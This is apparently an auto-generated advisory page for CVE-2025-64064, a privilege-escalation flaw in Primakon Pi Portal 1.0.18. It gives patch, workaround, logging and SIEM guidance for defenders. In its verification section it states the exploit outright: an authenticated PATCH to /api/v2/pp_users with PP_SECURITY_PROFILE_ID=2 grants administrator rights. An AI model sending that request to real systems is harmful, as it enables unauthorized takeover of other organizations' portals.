CVE-2025-64064
📋 TL;DR
Primakon Pi Portal 1.0.18 has an insecure direct object reference vulnerability in its /api/v2/pp_users endpoint that allows any authenticated user to escalate privileges to administrator. This affects all organizations using Primakon Pi Portal 1.0.18 with default configurations. Attackers can gain full administrative control over the system.
💻 Affected Systems
- Primakon Pi Portal
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise where attackers gain administrative access, modify all user permissions, access sensitive data, and potentially pivot to other systems.
Likely Case
Privilege escalation leading to unauthorized administrative access, data exfiltration, and configuration changes.
If Mitigated
Limited impact if proper network segmentation and monitoring are in place to detect privilege escalation attempts.
🎯 Exploit Status
Exploitation requires authenticated access but is trivial with a simple HTTP PATCH request. Public proof-of-concept exists in GitHub repository.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.0.19 or later
Vendor Advisory: https://www.primakon.com/rjesenja/primakon-pcm/
Restart Required: Yes
Instructions:
1. Backup current configuration. 2. Download and install Primakon Pi Portal version 1.0.19 or later from vendor portal. 3. Restart the Pi Portal service. 4. Verify the fix by testing the vulnerability.
🔧 Temporary Workarounds
API Endpoint Restriction
allBlock or restrict access to the vulnerable /api/v2/pp_users endpoint using web application firewall or reverse proxy rules.
# Example nginx location block
location /api/v2/pp_users {
deny all;
}
Network Segmentation
allIsolate Primakon Pi Portal from general user networks and restrict access to administrative interfaces only.
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the Pi Portal interface
- Enable detailed logging and monitoring for privilege escalation attempts and review logs daily
🔍 How to Verify
Check if Vulnerable:
Send authenticated PATCH request to /api/v2/pp_users endpoint with PP_SECURITY_PROFILE_ID=2 in body. If successful, system is vulnerable.Check Version:
Check Primakon Pi Portal web interface admin panel or configuration files for version information.Verify Fix Applied:
Attempt the same PATCH request after patching. Should receive permission denied error (403) or similar.📡 Detection & Monitoring
Log Indicators:
- HTTP PATCH requests to /api/v2/pp_users endpoint
- User privilege changes in audit logs
- Multiple failed authentication attempts followed by successful PATCH
Network Indicators:
- PATCH requests to /api/v2/pp_users with PP_SECURITY_PROFILE_ID parameter
- Unusual traffic patterns from low-privilege users
SIEM Query:
source="primakon" AND (url="/api/v2/pp_users" AND method="PATCH")